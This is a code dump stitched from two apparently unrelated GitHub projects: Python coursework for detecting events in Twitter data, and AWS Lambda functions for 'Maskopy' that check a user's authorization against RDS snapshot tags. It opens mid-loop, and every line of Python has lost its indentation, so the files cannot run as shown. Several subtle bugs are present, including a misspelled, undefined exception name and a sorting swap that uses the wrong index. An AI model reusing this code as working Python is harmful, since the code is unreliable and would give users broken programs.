for i in termTweets:
for k in i[1]:
for n in k:
for m in n:
if j[0] == m[0]:
setV2.append(i)
# mark1.append(count4)
break
count4 += 1
if len(setV2) < 10:
if len(termTweets) + len(setV2) > 10:
for ki in termTweets[0:(10 - len(setV2))]:
setV2.append(ki)
else:
for kj in termTweets:
setV2.append(kj)
else:
setV2 = setV2[0:10]
# Sets the collection of shards events used to merge similar events
fragVector = []
maxSim1 = 0
count2 = 0
for j in setV2:
avgSim1 = 0
for ils in j[1]:
if len(j[1]) > 0:
textC = []
for imp1 in ils:
for imp2 in imp1:
textC.append(imp2[0])
avgSim1 += cosineSim(textA, textC)
print(len(j[1]))
if len(j[1]) > 0:
tempSim1 = avgSim1 / len(j[1])
# Calculate the centroid of mass
if avgSim1 > maxSim1:
maxSim1 = avgSim1
kid = j[3]
# thresold for shards events
if tempSim1 >= (0.6 + 0.07):
fragVector.append(j)
count2 += 1
if maxSim1 > 0.6:
# Treatment after exceeding the maximum Q value
if len(termTweets[kid][1]) > 24:
minTimeMark = termTweets[kid][2]
specicaial.append(len(termTweets[kid][1]))
specicaial.append(termTweets[kid][1])
markid = 0
count10 += 1
# Find the earliest event and delete it
for y in termTweets:
if y[3] == kid:
for ny in y[1]:
count6 = 0
count7 = 0
for ny1 in ny[0]:
if count6 == 1:
count5 = 0
for ny2 in ny1:
if count5 == 1:
tempTime = time.mktime(
time.strptime(ny2[2], "%a %b %d %H:%M:%S +0000 %Y"))
if tempTime < minTimeMark:
minTimeMark = tempTime
markid = count7
break
count5 += 1
count6 += 1
break
count7 += 1
termTweets[kid][1][markid] = [topV]
avgTime = 0
# Recalculate the average time
for y in termTweets:
if y[3] == kid:
for ny in y[1]:
count6 = 0
for ny1 in ny[0]:
if count6 == 1:
count5 = 0
for ny2 in ny1:
if count5 == 1:
avgTime += time.mktime(
time.strptime(ny2[2], "%a %b %d %H:%M:%S +0000 %Y"))
break
count5 += 1
count6 += 1
break
termTweets[kid][2] = int(avgTime / len(termTweets[kid][1]))
# Merge the fragmentation events
if len(fragVector) > 1:
groupFragNum = []
groupFragUn = []
for fk in range(0, len(fragVector)):
for fk1 in range(fk + 1, len(fragVector)):
groupFragUn = fragVector[fk][1] + fragVector[fk1][1]
anum = fragVector[fk1][3]
del termTweets[anum:anum + 1]
bnum = fragVector[0][3]
termTweets[bnum][1] = groupFragUn[0:int(len(groupFragUn) / len(fragVector))]
maktag = 0
else:
# Adds new classes to similar event clusters
termTweets[kid][1].append([x])
avgTime1 = 0
count9 += 1
for y in termTweets:
if y[3] == kid:
for ny in y[1]:
count6 = 0
for ny1 in ny[0]:
if count6 < 1:
count5 = 0
for ny2 in ny1:
if count5 == 1:
avgTime1 += time.mktime(
time.strptime(ny2[2], "%a %b %d %H:%M:%S +0000 %Y"))
break
count5 += 1
count6 += 1
break
termTweets[kid][2] = int(avgTime1 / len(termTweets[kid][1]))
else:
# Delete the earliest event after exceeding the table length E
if (len(termTweets) <= 25) & (maktag == 0):
timeMoment4 = time.mktime(time.strptime(topV[0][1][2], "%a %b %d %H:%M:%S +0000 %Y"))
termTweets.append([topV[0][0], [[topV]], timeMoment4, count1])
count1 += 1
if len(termTweets) == 25:
maktag += 1
elif maktag > 0:
avgLen1 = 0
for item in termTweets:
avgLen1 += len(item[1])
avgLen1 = avgLen1 / len(termTweets)
# print("avglen:", avgLen1)
minLen2 = avgLen1
for iem in termTweets:
if len(iem[1]) < minLen2:
minLen2 = len(iem[1])
termTweets.sort(key=lambda sublist: sublist[2], reverse=True)
for item1 in termTweets:
if len(item1[1]) == minLen2:
timeMoment3 = time.mktime(time.strptime(topV[0][1][2], "%a %b %d %H:%M:%S +0000 %Y"))
termTweets[0] = [topV[0][0], [[topV]], timeMoment3, 0]
break
# Delete the earliest event after exceeding the table length E
else:
if (len(termTweets) <= 25) & (maktag == 0):
timeMoment2 = time.mktime(time.strptime(topV[0][1][2], "%a %b %d %H:%M:%S +0000 %Y"))
termTweets.append([topV[0][0], [[topV]], timeMoment2, count1])
count1 += 1
if len(termTweets) == 25:
maktag += 1
elif maktag > 0:
avgLen = 0
for item in termTweets:
avgLen += len(item[1])
avgLen = avgLen / len(termTweets)
# print("avglen:", avgLen)
minLen1 = avgLen
for iem in termTweets:
if len(iem[1]) < minLen1:
minLen1 = len(iem[1])
termTweets.sort(key=lambda sublist: sublist[2], reverse=True)
for item1 in termTweets:
if len(item1[1]) == minLen1:
timeMoment2 = time.mktime(time.strptime(topV[0][1][2], "%a %b %d %H:%M:%S +0000 %Y"))
termTweets[0] = [topV[0][0], [[topV]], timeMoment2, 0]
break
loopTimes += 1
for x in termTweets:
print(x)
print(len(x[1]))
# print(len(termTweets))
# print(count9)
# print(count10)
# print(specicaial)
finalR = []
count22 = 0
count23 = 0
count24 = 0
count26 = 0
for x in termTweets:
if len(x[1]) > 10:
count26 += 1
groupFinalR = []
for i in x[1]:
for j in i:
groupFinalR.append(j[0][1][2])
count25 = 0
for xn in j:
if count25 < 1:
if xn[1][3]:
count22 += 1
if xn[1][4]:
count23 += 1
if (xn[1][3] is None) & (xn[1][4] is None):
count24 += 1
count25 += 1
finalR.append(groupFinalR)
print("total clusters:", len(doc_set))
print("total time spent %.2f sec" % (time.time() - eTimeStart))
print("geo-coordination tag:", count22)
print("location tag:", count23)
print("without any geo tag tag:", count24)
print("events num:", count26)
```
#### File: Jin-Tao-208/web_science_coursework/eventsDetect.py
```python
from datetime import datetime
from DateInfo import DateInfo
from pymongo import MongoClient
# import time
client = MongoClient('127.0.0.1', 27017) # is assigned local port
dbName = "TwitterDump" # set-up a MongoDatabase
db = client[dbName]
collName = 'colTest1' # here we create a collection
collection = db[collName] # This is for the Collection put in the DB
bol = False
result = collection.find({"retweet": bol})
class EventSummaryExtractor(object):
def __init__(self):
# self.DEF_INFILENAME = "ows.json"
self.CATEGORIES = {}
self.twittersdm = "%a %b %d %H:%M:%S Z %Y"
self.dayhoursdm = "%Y-%b-%d:%H"
self.daysdm = "%b/%d/%Y"
self.hoursdm = "%H"
def initialize_categories(self):
self.CATEGORIES["People"] = ["protesters", "people"]
self.CATEGORIES["Police"] = ["police", "cops", "nypd", "raid"]
self.CATEGORIES["Media"] = ["press", "news", "media"]
self.CATEGORIES["Location"] = ["nyc", "zucotti", "park"]
self.CATEGORIES["Judiciary"] = ["judge", "eviction", "order", "court"]
def extract_category_trends(self, fp):
"""
:param filename:
:return:
"""
result = {}
temp = ""
catkeys = self.CATEGORIES.keys()
datecount = {}
# Open file and get time stamps from the tweets
for temp in fp:
d = ""
# jobj = fp[3]
# time = jobj[7]
# d = datetime.fromtimestamp(time / 1000)
# if "created_at" in jobj:
# time = ""
# time = jobj["created_at"]
# if not time:
# continue
# else:
# d = datetime.strptime(time, self.twittersdm)
# elif "timestamp" in jobj:
# time = jobj["timestamp"]
# d = datetime.fromtimestamp(time / 1000)
time = temp[7]
d = datetime.fromtimestamp(time)
datestr = d.strftime(self.dayhoursdm)
text = temp[3]
# Assign it to the category the tweets belong to
for key in catkeys:
words = self.CATEGORIES.keys()
for word in words:
if word.lower() in text:
categorycount = {}
if datestr in datecount:
categorycount = datecount[datestr]
if key in categorycount:
categorycount[key] += 1
else:
categorycount[key] = 1
datecount[datestr] = categorycount
break
datekeys = set(datecount.keys())
dinfos = []
# For each datekeys generate a DateInfo class object and append
for date in datekeys:
d = datetime.strptime(date, self.dayhoursdm)
if d:
info = DateInfo()
info.d = d
info.catcounts = datecount[date]
dinfos.append(info)
# Sort in descending order of the dates
dinfos.sort(reverse=True)
# Assign asixsteps according to number of categories and dates
result["axisxstep"] = len(dinfos) - 1
result["axisystep"] = len(self.CATEGORIES) - 1
xcoordinates = []
ycoordinates = []
axisxlabels = []
axisylabels = []
data = []
for key in catkeys:
axisylabels.append(key)
i = 0
j = 0
for date in dinfos:
strdate = date.d.strftime(self.hoursdm)
axisxlabels.append(strdate)
catcounts = date.catcounts
for key in catkeys:
xcoordinates.append(j)
ycoordinates.append(i)
i += 1
if key in catcounts:
data.append(catcounts[key])
else:
data.append(0)
i = 0
j += 1
result["xcoordinates"] = xcoordinates
result["ycoordinates"] = ycoordinates
result["axisxlabels"] = axisxlabels
result["axisylabels"] = axisylabels
result["data"] = data
return result
def get_data(result):
"""
Function to generate Event summary from the Categories given
:return:
"""
# global infile_name
ese = EventSummaryExtractor()
ese.initialize_categories()
return ese.extract_category_trends(result)
if __name__ == '__main__':
global infile_name
ese = EventSummaryExtractor()
# parser = argparse.ArgumentParser()
# parser.add_argument('-i', nargs="?", default=ese.DEF_INFILENAME,
# help='Name of the input file containing tweets')
# print(get_data(result))
textTotal = []
for x in result:
groupInfo = [x['coordinates'], x['_id'], x['username'], x['text'].lower(), x['place_name'], x['place_country'],
x['place_coordinates'], x['date']]
textTotal.append(groupInfo)
for x in textTotal:
# print(datetime.strptime(x[7], "%a %b %d %H:%M:%S Z %Y"))
timeArry = datetime.strptime(x[7], "%a %b %d %H:%M:%S +0000 %Y")
# timestamp = time.mktime(timeArry)
x[7] = datetime.timestamp(timeArry)
# print(timeArry)
print(get_data(textTotal))
# print(textTotal)
```
#### File: Jin-Tao-208/web_science_coursework/rankText.py
```python
import json
import time
import math
with open('textGrouped.json', 'r', encoding='utf-8') as f:
data = json.load(f)
cout0 = 0
cout = 0
data_set = []
mark_set = []
text_set = []
follower_set = []
age_set = []
verified_set = []
profile_set = []
avgClass = []
for i in range(0, len(data)):
groupClass = []
sumVal = 0
for j in range(0, len(data[i])):
groupCol = []
followerVal = data[i][j][5]
veridiedVal = data[i][j][6]
profileVal = data[i][j][7]
descriptionVal = data[i][j][8]
timeArry = time.strptime(data[i][j][4], "%a %b %d %H:%M:%S +0000 %Y")
ageTime = time.time() - time.mktime(timeArry)
ageVal = int(abs(ageTime)) // 24 // 3600
dayMark = 0
followerMark = 0
verifiedMark = 0
profileMark = 0
descriptionMark = 0
if ageVal < 1:
dayMark = 0.05
elif ageVal < 30:
dayMark = 0.10
elif ageVal > 90:
dayMark = 0.25
if followerVal < 50:
followerMark = 0.5
elif followerVal < 5000:
followerMark = 1.0
elif followerVal < 10000:
followerMark = 1.5
elif followerVal < 100000:
followerMark = 2.0
elif followerVal < 200000:
followerMark = 2.5
elif followerVal > 200000:
followerMark = 3.0
if veridiedVal:
verifiedMark = 1.5
else:
verifiedMark = 1.0
if profileVal:
profileMark = 0.5
else:
profileMark = 1
if descriptionVal:
descriptionMark = 1.2
else:
descriptionMark = 0.8
qualityScore = (dayMark + verifiedMark + followerMark + profileMark + descriptionMark) / 5
# print(ageTime)
# groupCol.append(ageTime)
groupClass.append(qualityScore)
sumVal += qualityScore
# x = computeScore(data[i][j][3], data[i][j][4], data[i][j][5], data[i][j][6])
mark_set.append(groupClass)
avgClass.append(sumVal / len(data[i]))
# print(mark_set)
for x in range(0, len(mark_set)):
for i in range(0, len(mark_set[x])):
if len(mark_set[x]) > 1:
for j in range(i + 1, len(mark_set[x])):
if mark_set[x][i] > mark_set[x][j]:
maxVal = mark_set[x][i]
mark_set[x][i] = mark_set[x][j]
mark_set[x][j] = maxVal
maxSet = data[x][j]
data[x][i] = data[x][j]
data[x][j] = maxSet
# print(mark_set)
for x in range(0, len(mark_set)):
for i in range(x + 1, len(mark_set)):
if avgClass[x] > avgClass[i]:
turn1 = avgClass[x]
avgClass[x] = avgClass[i]
avgClass[i] = turn1
turn2 = mark_set[x]
mark_set[x] = mark_set[i]
mark_set[i] = turn2
turn3 = data[x]
data[x] = data[i]
data[i] = turn3
# print(mark_set)
# print("---------------------")
# print(avgClass)
dataFilter = []
for x in data:
if len(x) > 10:
dataFilter.append(x)
minSize = len(dataFilter[0])
maxSize = 0
avgSize = 0
for x in dataFilter:
if len(x) < minSize:
minSize = len(x)
if len(x) > maxSize:
maxSize = len(x)
avgSize += len(x)
print("Arrange the data within and between groups in ascending order, and delete groups of less than 10 items as noise")
print("total nums group is :", len(dataFilter))
print("filtered group max Size:", maxSize)
print("filtered group min Size:", minSize)
print("filtered group average Size:", avgSize / len(dataFilter))
with open("textRanked.json", 'w', encoding="utf-8") as g1:
json.dump(dataFilter, g1, ensure_ascii=False)
def computeTF(wordDict, bow):
tfDict = {}
bowCount = len(bow)
for word, count in wordDict.items():
tfDict[word] = count / float(bowCount)
return tfDict
def computeIDF(docList):
idfDict = {}
N = len(docList)
idfDict = dict.fromkeys(docList[0].keys(), 0)
for doc in docList:
for word, val in doc.items():
if val > 0:
idfDict[word] += 1
for word, val in idfDict.items():
idfDict[word] = math.log10(N / float(val))
return idfDict
def computeTFIDF(tfBow, idfs, cId):
tfidf = []
for word, val in tfBow.items():
tfidfInfo = []
tfidfInfo.append(word)
tfidfInfo.append([val * idfs[word]])
tfidf.append(tfidfInfo)
return tfidf
print("For valuable information, select the top 5 TF-IDF words in each group")
for group1 in dataFilter:
wordSet = []
wordSet1 = []
print(group1)
group = group1[0:10]
for tweetContent in group:
wordSet = list(set(wordSet).union(set(tweetContent[1])))
for i in range(0, len(group)):
wordSet1.append(dict.fromkeys(wordSet, 0))
for sentence in range(0, len(group)):
for word in group[sentence][1]:
wordSet1[sentence][word] += 1
tfresult = []
for x in range(0, len(group)):
x = computeTF(wordSet1[x], group[x][1])
tfresult.append(x)
idfresult = computeIDF(wordSet1)
tfidfResult = []
worthResult = []
for x in range(0, len(group)):
worthGroup = computeTFIDF(tfresult[x], idfresult, x)
worthGroupInfo = []
for i in range(0, len(worthGroup)):
if worthGroup[i][1][0] != 0:
columGroup = []
columGroup.append(worthGroup[i][0])
columGroup.append(worthGroup[i][1])
worthGroupInfo.append(columGroup)
worthResult.append(worthGroupInfo)
groupKey = []
for x in worthResult:
groupKeyInfo = []
count10 = 0
for i in x:
if len(i) > 0 & count10 < 3:
groupKeyInfo.append(i[0])
groupKeyInfo.append(i[1])
count10 += 1
groupKey.append(groupKeyInfo)
try:
groupKey.sort(key=lambda sublist: sublist[0][1], reverse=True)
resultTop = groupKey[0:5]
for x in resultTop:
print(x[0])
except Exception as e:
pass
```
#### File: Jin-Tao-208/web_science_coursework/TwitterEventDetector.py
```python
from collections import OrderedDict
import json
from math import exp
import os
from BurstySegmentExtractor import BurstySegmentExtractor
from Segment import Segment
from TimeWindow import SubWindow
from TweetSegmenter import SEDTWikSegmenter
from utils.pyTweetCleaner import TweetCleaner
class TwitterEventDetector():
def __init__(self, wiki_titles_file, seg_prob_file, wiki_Qs_file, remove_retweets=False, max_segment_length=4,
hashtag_wt=3,
use_retweet_count=True, use_followers_count=True, default_seg_prob=0.000001, entities_only=False):
self.segmenter = SEDTWikSegmenter(wiki_titles_file, max_segment_length, hashtag_wt, entities_only)
self.remove_retweets = remove_retweets
self.bse = BurstySegmentExtractor(seg_prob_file, use_retweet_count, use_followers_count, default_seg_prob)
# prob that a segment is anchor text in all pages containing that segment
with open(wiki_Qs_file, 'r') as f:
self.wiki_prob = json.load(f)
def clean_tweets_in_directory(self, root_dir, target_dir):
"""
clean tweets in root_dir using pyTweetCleaner and save cleaned files in target_dir
This need to be done just once and then the cleaned tweets can be used afterward
"""
print('Cleaning all tweets in given directory')
tc = TweetCleaner(True, self.remove_retweets)
if not os.path.isdir(target_dir): os.mkdir(target_dir)
for dir_path, _, file_list in os.walk(root_dir):
dir_path = dir_path.replace('\\',
'/') # make windows-like path to unix-like path which can be used for both
dir_name = dir_path.replace(root_dir, '')
print('Found directory: %s' % dir_name)
target_file_path = target_dir + '/' + dir_name
if not os.path.isdir(target_file_path): os.mkdir(target_file_path)
for fname in file_list:
print(fname)
tc.clean_tweets(input_file=dir_path + '/' + fname, output_file=target_file_path + '/' + fname)
print('Cleaned all tweets and saved to', target_dir)
def read_subwindow(self, file_path):
"""
read a SubWindow from a file
all tweets in given file belong to the subwindow
"""
segments = {}
tweet_count = 0
f = open(file_path, 'rb')
for line in f:
line = line.decode().replace('\n', '')
if line == '': continue
json_tweet = json.loads(line)
# json_tweet = line
tweet_count += 1
user_id = json_tweet['user']['id']
retweet_count = json_tweet['retweet_count']
followers_count = json_tweet['user']['followers_count']
segmentation = self.segmenter.tweet_segmentation(json_tweet)
tweet_text = ' '.join(list(OrderedDict.fromkeys(
segmentation))) # because of hashtag_wt, some segments might be multiple in tweet text after joining so remove them
tweet_text = ''.join([c for c in tweet_text if ord(
c) < 256]) # dont know why but some non ascii chars like \u0441='c'still survived segmentation!!!
for seg in segmentation:
if not seg in segments:
new_seg = Segment(seg)
new_seg.newsworthiness = self.get_segment_newsworthiness(seg)
segments[seg] = new_seg
segments[seg].add_tweet(user_id, tweet_text, retweet_count, followers_count)
f.close()
sw = SubWindow(segments, tweet_count)
return sw
def get_segment_newsworthiness(self, seg):
"""
return max exp(Q(l))-1 from all sub phrases 'l' in seg(string)
"""
seg = seg.split(' ')
n = len(seg)
# max_sub_phrase_prob = max([self.get_wiki_Qs_prob(seg[i:i+j+1]) for i in range(n) for j in range(n-i)])
# return exp(max_sub_phrase_prob)-1
if n == 1:
return exp(self.get_wiki_Qs_prob(seg))
else:
max_sub_phrase_prob = max([self.get_wiki_Qs_prob(seg[i:i + j + 1]) for i in range(n) for j in range(n - i)])
return exp(max_sub_phrase_prob) - 1
def get_wiki_Qs_prob(self, seg):
"""
return prob that seg(list of words) is an anchor text from all pages containing seg
"""
return self.wiki_prob.get(' '.join(seg), 0)
``` |
{
"source": "JintaoH/maskopy",
"score": 2
} |
#### File: lambda/00-AuthorizeUser/index.py
```python
import json
import os
import re
import boto3
import requests
from botocore.exceptions import ClientError
STS_CLIENT = boto3.client("sts")
ASSUME_ROLE_ARN = os.environ['assume_role_arn']
def lambda_handler(event, context):
"""Lambda handler for the zeroth lambda of the Maskopy process.
Args:
event (dict): AWS Lambda uses this parameter to pass in event data to the handler.
context (Context): AWS Lambda provides runtime info and meta data.
Raises:
MaskopyAccessException: Raise exception if IAM role or user does not have access
to resource.
"""
if not event['ApplicationName']:
raise Exception(
"Input 'ApplicationName' is missing. Please check your step function inputs."
)
# Create and assume a session in the source account.
assume_role_session = create_account_session(
STS_CLIENT,
ASSUME_ROLE_ARN,
context.aws_request_id
)
# Create an RDS client to source account.
rds_client = assume_role_session.client('rds')
application_name = event['ApplicationName']
if event.get('RdsSnapshotIdentifier') != "":
engine=get_engine(event.get('RdsSnapshotIdentifier'),rds_client)
snapshot_identifier = event.get('RdsSnapshotIdentifier')
else:
engine=get_instance_engine(event.get('RdsInstanceIdentifier'),rds_client)
rds_identifier = event['RdsInstanceIdentifier']
url = event["PresignedUrl"]
# Get tags from RDS snapshot. This is used to check user authorization.
if event['RdsSnapshotIdentifier']:
try:
tags = get_snapshot_tags(rds_client, snapshot_identifier,engine['Type'])
snapshot_ags = next(tag for tag in tags if tag["Key"] == "ApplicationName")["Value"].upper()
except:
raise MaskopyAccessException("Snapshot (" + snapshot_identifier + ") does not have ApplicationName tag.")
elif event['RdsInstanceIdentifier']:
try:
tags = get_db_tags(rds_client, rds_identifier,engine['Type'])
print(f"RDS Tags are {tags}.")
snapshot_ags = next(tag for tag in tags if tag["Key"] == "ApplicationName")["Value"].upper()
print(f"RDS Snapshot Tags are {snapshot_ags}.")
except MaskopyResourceNotFoundException as err:
raise MaskopyResouceNotFoundException(err)
except:
raise MaskopyAccessException("RDS (" + rds_identifier + ") does not have a instance with correct ApplicationName tag.")
else:
raise MaskopyAccessException("No snapshot or rds provided")
# Get role from presigned url. This is used to authenticate the user.
role = get_role_from_presigned_url(url)
print(f"Running Maskopy with role: {role}.")
try:
snapshot_application_name = next(tag for tag in tags if tag["Key"] == "ApplicationName")["Value"]
except:
raise MaskopyAccessException(
f"Snapshot({snapshot_identifier}) does not have 'ApplicationName' tag."
)
# Verify if the role contains the application name and
# if the role contains the snapshot tag.
if application_name.lower() not in role.lower():
raise MaskopyAccessException(
f"User role ({role}) does not match ApplicationName input: {application_name}")
if snapshot_application_name.lower() not in role.lower():
raise MaskopyAccessException(
f"User role ({role}) is not authorized to access this snapshot: "
f"{snapshot_application_name}")
print("User successfully authorized!")
return engine
def get_engine(snapshot_identifier, rds_client):
"""Function to retrieve engine version (RDS or Aurora)
Args:
rds_client (Client): AWS RDS Client object.
snapshot_identifier (str): The RDS snapshot identifier
Returns:
:obj:`dict` of :obj:`str`: Returns the engine response from rds_client for the snapshot
Raises:
MystifyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
MystifyResourceNotFoundException: Exception raised if resource does not exist.
"""
try:
print(f'Checking snapshot engine with the following name: {snapshot_identifier}')
snapshot_response= rds_client.describe_db_snapshots(
DBSnapshotIdentifier=snapshot_identifier)
snapshot_return= {
'Type':snapshot_response['DBSnapshots'][0]['Engine'],
'Version': snapshot_response['DBSnapshots'][0]['EngineVersion']
}
return snapshot_return
except ClientError as err:
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
elif err.response['Error']['Code']=='DBSnapshotNotFound':
try:
#CLUSTER SNAPSHOT METHOD
snapshot_response= rds_client.describe_db_cluster_snapshots(
DBClusterSnapshotIdentifier=snapshot_identifier)
snapshot_return= {
'Type':snapshot_response['DBClusterSnapshots'][0]['Engine'],
'Version': snapshot_response['DBClusterSnapshots'][0]['EngineVersion']
}
return snapshot_return
except ClientError as err:
print(f"Failed to get RDS type for {snapshot_identifier}: {err}")
raise MaskopyResourceNotFoundException(err)
print(f'There was a problem checking the DB snapshot engine: {err}')
raise
def get_instance_engine(rds_identifier, rds_client):
"""Function to retrieve engine version (RDS or Aurora)
Args:
rds_client (Client): AWS RDS Client object.
rds_identifier (str): The RDS instance identifier
Returns:
:obj:`dict` of :obj:`str`: Returns the engine response from rds_client for the instance
Raises:
MystifyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
MystifyResourceNotFoundException: Exception raised if resource does not exist.
"""
try:
print(f'Checking instance engine with the following name: {rds_identifier}')
instance_response= rds_client.describe_db_instances(
DBInstanceIdentifier=rds_identifier)
instance_return= {
'Type':instance_response['DBInstances'][0]['Engine'],
'Version': instance_response['DBInstances'][0]['EngineVersion']
}
return instance_return
except ClientError as err:
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
elif err.response['Error']['Code']=='DBInstanceNotFound':
try:
#CLUSTER SNAPSHOT METHOD
instance_response= rds_client.describe_db_clusters(
DBClusterIdentifier=rds_identifier)
instance_return= {
'Type':instance_response['DBClusters'][0]['Engine'],
'Version': instance_response['DBClusters'][0]['EngineVersion']
}
return instance_return
except ClientError as err:
print(f"Failed to get RDS type for {rds_identifier}: {err}")
raise MaskopyResourceNotFoundException(err)
print(f'There was a problem checking the DB snapshot engine: {err}')
raise
def get_role_from_presigned_url(url):
"""Function to retrieve role from presigned url.
Args:
url (str): Presigned url to request the role.
Raises:
MaskopyHTTPException: Raise exception if HTTP client POST request fails,
or for any other general HTTP exception.
MaskopyTimeoutException: Raise exception if HTTP client POST request times out.
"""
# POST Request to url. Raise HTTP related exceptions as needed.
try:
request = requests.post(url, headers={'Accept': 'application/json'})
request.raise_for_status()
except requests.exceptions.HTTPError as err:
raise MaskopyHTTPException(err)
except requests.exceptions.Timeout:
raise MaskopyTimeoutException("Request timed out.")
except requests.exceptions.RequestException as err:
raise MaskopyHTTPException(err)
# Get the name of the role from the predefined url.
data = json.loads(request.text)
arn = data['GetCallerIdentityResponse']['GetCallerIdentityResult']['Arn']
return arn.split('/')[1]
def get_snapshot_tags(rds_client, snapshot_identifier, engine):
"""Function to retrieve list of tags from snapshot_identifier
Args:
rds_client (Client): AWS RDS Client object.
snapshot_identifier (str): The RDS snapshot identifier
engine (str): Engine type
Returns:
:obj:`list` of :obj:`str`: The list of tags associated with snapshot,
None otherwise.
Raises:
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
MaskopyResourceNotFoundException: Exception raised if resource does not exist.
"""
if 'aurora' in engine:
return get_snapshot_tags_cluster(rds_client, snapshot_identifier)
else:
return get_snapshot_tags_instance(rds_client, snapshot_identifier)
def get_snapshot_tags_instance(rds_client, snapshot_identifier):
"""Function to retrieve list of tags from snapshot_identifier
Args:
rds_client (Client): AWS RDS Client object.
snapshot_identifier (str): The RDS snapshot identifier
Returns:
:obj:`list` of :obj:`str`: The list of tags associated with snapshot,
None otherwise.
Raises:
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
MaskopyResourceNotFoundException: Exception raised if resource does not exist.
"""
try:
# INSTANCE SNAPSHOT METHODS
describe_db_response = rds_client.describe_db_snapshots(
DBSnapshotIdentifier=snapshot_identifier)
snapshot_arn = describe_db_response['DBSnapshots'][0]['DBSnapshotArn']
list_tags_response = rds_client.list_tags_for_resource(
ResourceName=snapshot_arn)
return list_tags_response['TagList']
except ClientError as err:
# Check if error code is due to throttling.
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
print(f"Failed to get RDS tags for {snapshot_identifier}: {err}")
raise MaskopyResourceNotFoundException(err)
def get_snapshot_tags_cluster(rds_client, snapshot_identifier):
"""Function to retrieve list of tags from snapshot_identifier
Args:
rds_client (Client): AWS RDS Client object.
snapshot_identifier (str): The RDS cluster snapshot identifier
Returns:
:obj:`list` of :obj:`str`: The list of tags associated with snapshot,
None otherwise.
Raises:
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
MaskopyResourceNotFoundException: Exception raised if resource does not exist.
"""
try:
#CLUSTER SNAPSHOT METHOD
describe_db_response = rds_client.describe_db_cluster_snapshots(
DBClusterSnapshotIdentifier=snapshot_identifier)
snapshot_arn = describe_db_response['DBClusterSnapshots'][0]['DBClusterSnapshotArn']
list_tags_response = rds_client.list_tags_for_resource(
ResourceName=snapshot_arn)
return list_tags_response['TagList']
except ClientError as err:
# Check if error code is due to throttling.
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
print(f"Failed to get Cluster RDS tags for {snapshot_identifier}: {err}")
raise MaskopyResourceNotFoundException(err)
def get_db_tags(rds_client, rds_identifier, engine):
"""Return list of tags associated with source DB. Return false DB doesn't exist."""
if 'aurora' in engine:
return get_db_tags_cluster(rds_client, rds_identifier)
else:
return get_db_tags_instance(rds_client, rds_identifier)
def get_db_tags_instance(rds_client, rds_identifier):
"""Return list of tags associated with source DB. Return false DB doesn't exist."""
try:
describe_db_response = rds_client.describe_db_instances(
DBInstanceIdentifier=rds_identifier
)
rds_arn = describe_db_response['DBInstances'][0]['DBInstanceArn']
list_tags_response = rds_client.list_tags_for_resource(
ResourceName=rds_arn
)
return list_tags_response['TagList']
except ClientError as err:
raise MaskopyResouceNotFoundException(err)
def get_db_tags_cluster(rds_client, rds_identifier):
"""Return list of tags associated with source DB. Return false DB doesn't exist."""
try:
describe_db_response = rds_client.describe_db_clusters(
DBClusterIdentifier=rds_identifier
)
rds_arn = describe_db_response['DBClusters'][0]['DBClusterArn']
list_tags_response = rds_client.list_tags_for_resource(
ResourceName=rds_arn
)
return list_tags_response['TagList']
except ClientError as err:
raise MaskopyResourceNotFoundException(err)
def create_account_session(sts_client, role_arn, request_id):
"""Function to create and assume account role.
Args:
sts_client (Client): AWS STS Client object.
role_arn (str): The arn of the role to assume a session.
request_id (str): UUID for session to uniquely identify session name.
Returns:
:obj:`boto3.session.Session`:
A session of the role to be used.
"""
sts_response = sts_client.assume_role(
RoleArn=role_arn,
RoleSessionName=request_id)
return boto3.session.Session(
aws_access_key_id=sts_response['Credentials']['AccessKeyId'],
aws_secret_access_key=sts_response['Credentials']['SecretAccessKey'],
aws_session_token=sts_response['Credentials']['SessionToken']
)
class MaskopyAccessException(Exception):
"""Exception raised when IAM role or user is not able to access the
resource due to authorization error.
"""
class MaskopyResourceNotFoundException(Exception):
"""Exception raised when IAM role or user is not able to access the
resource since the resource does not exist.
"""
class MaskopyHTTPException(Exception):
"""Exception raised when HTTP request returns a 4xx or 5xx error.
"""
class MaskopyTimeoutException(Exception):
"""Exception raised when HTTP request times out.
"""
class MaskopyThrottlingException(Exception):
"""Exception raised when AWS request returns a Throttling exception.
"""
```
#### File: lambda/01-CheckInputs/index.py
```python
import os
import json
import re
import boto3
from botocore.exceptions import ClientError
STS_CLIENT = boto3.client("sts")
CUSTOM_KMS_KEY = os.environ['custom_kms_key']
ASSUME_ROLE_ARN = os.environ['assume_role_arn']
def lambda_handler(event, context):
"""Lambda handler for the first lambda of the Maskopy process.
Args:
event (dict): AWS Lambda uses this parameter to pass in event data to the handler.
context (Context): AWS Lambda provides runtime info and meta data.
Returns:
:obj:`dict` of str:str: Return dict with details of snapshot that was created.
Raises:
MaskopyResourceNotFoundException: Raised if inputs are not valid.
Exception: Generic exception raised
if final snapshot name already exists in destination.
"""
rds_client_local = boto3.client("rds")
assume_role_session = create_account_session(
STS_CLIENT,
ASSUME_ROLE_ARN,
context.aws_request_id)
rds_client = assume_role_session.client('rds')
# Check if inputs are valid and have valid resources.
try:
check_inputs(event)
check_valid_resources(rds_client_local, rds_client, event)
print("All input values verified")
except MaskopyResourceNotFoundException:
print("One or more of required inputs are missing/invalid. Please check your inputs.")
raise
return {"firstSnapshotIdentifier": event.get("RdsSnapshotIdentifier")}
def check_inputs(step_event):
"""Function to check and validation inputs in step_event dictionary.
This function does not return anything, but raises MaskopyResourceNotFoundException
if inputs do not exist or are invalid.
Args:
step_event (dict): AWS Lambda uses this parameter to pass in event data to the handler.
Raises:
MaskopyResourceNotFoundException: Raised if input is not found or is empty.
"""
print("Checking step function inputs...")
# Loop through keys and check if they are not None or empty values in the step_event
keys = ['ApplicationName', 'CostCenter', 'DestinationEnv']
for key in keys:
if not step_event.get(key):
raise MaskopyResourceNotFoundException(
f'{key} is missing. Please check your step function inputs.')
